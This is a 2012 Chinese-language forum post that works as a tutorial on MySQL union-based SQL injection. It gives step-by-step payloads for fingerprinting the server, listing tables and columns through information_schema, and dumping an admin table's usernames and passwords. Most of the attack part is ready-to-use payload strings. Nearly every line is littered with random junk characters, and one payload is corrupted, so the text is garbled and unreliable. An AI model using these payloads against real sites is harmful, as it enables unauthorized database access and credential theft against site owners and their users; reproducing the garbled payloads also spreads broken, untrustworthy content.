中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
  h1 o% X1 D9 D9 v8 F/ l3 z8 q- B  P) ^% `
学习盲注前先了解下 IFORMATION_SCHEMA 库( r/ B1 ?5 {, v8 Q" w& `6 V/ I
: p2 \1 h8 z  A, J) }. K- n
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有9 u9 H4 o% Q+ d% ~( E
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。! X: b! W  U: T" A9 p0 h
1.得到所有数据库名:, f$ m0 }, O( u0 R6 H  v, u
|SCHEMATA ->存储数据库名的表
( }6 h% r' F0 t' U/ x/ T7 K! I1 X; n|---字段:SCHEMA_NAME ->数据库名称4 y# @# G$ B1 _2 {' q

5 K. Z- ]6 g' [|TABLES ->存储表名% Z' l% Z8 {! _5 P7 j( N
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
) d$ a- E) m) X$ T. {8 d|---字段:TABLE_NAME ->存储表的表名) ~5 c3 G- ?9 z! [# }3 E

0 c. w- G4 ?3 J5 T3 k* a2 `% m|COLUMNS ->存储的字段名表
0 [% b, ~0 ?, a( j& L$ e|---字段:TABLE_SCHEMA ->该字段所属数据库名6 \5 W2 x" E5 n) G# n
|---字段:TABLE_NAME ->存储所属表的名称# J/ N& y9 y  k& D' H1 U; O
& x# r; o/ b) z6 T" B1 }
|---字段:COLUMN_NAME ->该字段的名称
: g# k5 T, S0 R0 j8 A( m4 z# `' B
' S/ g) q) G& h7 l + {3 n" `4 R- n/ g! J' N4 p1 g

- G2 r6 C* b/ W( m2 w# s###########################################################################- M2 h! S; o! q% d- m" S3 \/ h
# v% r* l; r+ \
0x001 获取系统信息:2 Y2 A' a* O5 I- U  [
% w; W4 ~$ ?9 D7 T
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
" u8 A' C. P- f! L. e1 A& Y7 F: Z3 s8 m9 V
/*
0 e- e4 f3 K# a2 n* I% l0 A0 o8 B
( m% `  [% ?4 j9 V  c@@global.version_compile_os 获取系统版本
3 d8 h; k5 g1 `8 i; |  r5 a% k3 x
5 V+ k9 w, Q. i@@datadir 数据库路径
( m6 J& t  P3 ?, L* k0 Bdatabase() 当前数据库名称
5 u0 N. H' x2 |3 a4 p. ^* @0x3c62723e 换行HEX值
0 b5 d" ^) r7 m: k3 D, W) i) p6 }7 g* l& g, z
*/
# q7 ~! ^7 ?8 `3 Y$ a) Y& j/ r. {$ S5 w
$ c9 v6 w5 K- I7 b7 B4 I: h4 x : {& B# B& S" @% [0 X0 }
' g0 R4 T' Y' p( }# _
######################################################################
1 z5 d; `6 E. T9 g( E+ N5 N7 s" k) w( E$ `
0x002 获取表名$ H: e8 d- F9 T1 {/ B' H1 w4 C

- D  z) `0 b: t) {  D" runion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
$ Y/ j. M. {0 ]& C' d* p/ j4 F8 v6 i. m3 b  Q6 ?$ i
* V) K1 h! x2 R* _3 [6 q
$ Y# t, |2 V& \& g& R) {
/*
. w, M( K8 l3 l+ @) t
  {: y4 i+ U& H0x67617264656e 为当前数据库名+ p0 c  j2 y% t/ J+ n) e
( k0 n) M2 v: Q/ N
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
( l( x* U" D; U, J) _
2 U9 L5 p  ^* k, m" i: l0 a*/
$ V2 n& j) h+ |4 F2 Q1 E
4 H' L: J- m# D: p######################################################################+ ?, x! c0 M, ~2 L' y$ T% Q

4 D7 Z4 z! M; Q# q
3 U# f9 l' E# N5 N8 }
# {& o2 L& n1 D9 g& C% E0x003 获取字段; H' u6 ^: r- f
: m5 Y* O5 P6 a; Q
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) M( B3 \" v# q2 W1 Y
: Y% i# q# g+ G; Z' j% U/*
. t( ^/ O( a2 y7 H2 f: |6 j  ~, F, C
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
* O* x( {. y* F8 c  _) w+ x& H1 V9 ^- J* r$ f) c
0x61646d696e ->选择一个表
4 R( T9 T; \  R, \7 B6 g
" S2 P3 ~2 U3 E, Q4 q6 U5 F9 j0x67617264656e ->数据库名0 ^0 L) m7 U, X3 R) k, x- T
* O1 _! a8 ^0 u
*/, d* g; D8 E: g. c
0 p, N. y' X4 {6 H5 k
#####################################################################
+ v$ S1 l4 j4 }' C2 Q
; ~9 K. C% l: V2 i$ r % L* h; C; T7 E4 G! L. U! q

4 M- _1 M$ W* F5 U: k2 d* Q) q6 y8 K, Y0x004 获取数据! P/ Q3 @( G+ v$ a
" G# \) E7 R) \" e
union select 1,2,3
0 G$ G2 ~& {9 A" W,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin2 J0 \1 F5 e/ ^( z% V

' G7 p6 S. K8 K1 i7 k0 q+ F" z) a" iunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
' ?- _7 D9 A! M, h3 D4 O$ z' V
/ r6 m1 z7 |. ~1 C3 l 0 d# X( G& ]* [$ [+ w! f4 c

+ b" j7 B1 P. f/ b2 ?7 A/*
+ C/ r6 W6 Q9 h
( i3 B5 A& J6 a" w2 ~( Z8 G- D0x3c62723e 换行符号HEX编码1 z" O: o6 V( T2 o2 F! `8 E( X& D

8 x/ @7 {6 E% B5 mgroup_concat 同时获得该字段所有数据1 f8 ^+ V/ ?: g  U; g+ w. `, h

; ^4 e5 n1 K" o+ k*/
: R' p9 M. q+ \8 O: V  ^) B/ Z& t
1 B3 p( L* }4 E7 N9 y  i7 l




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2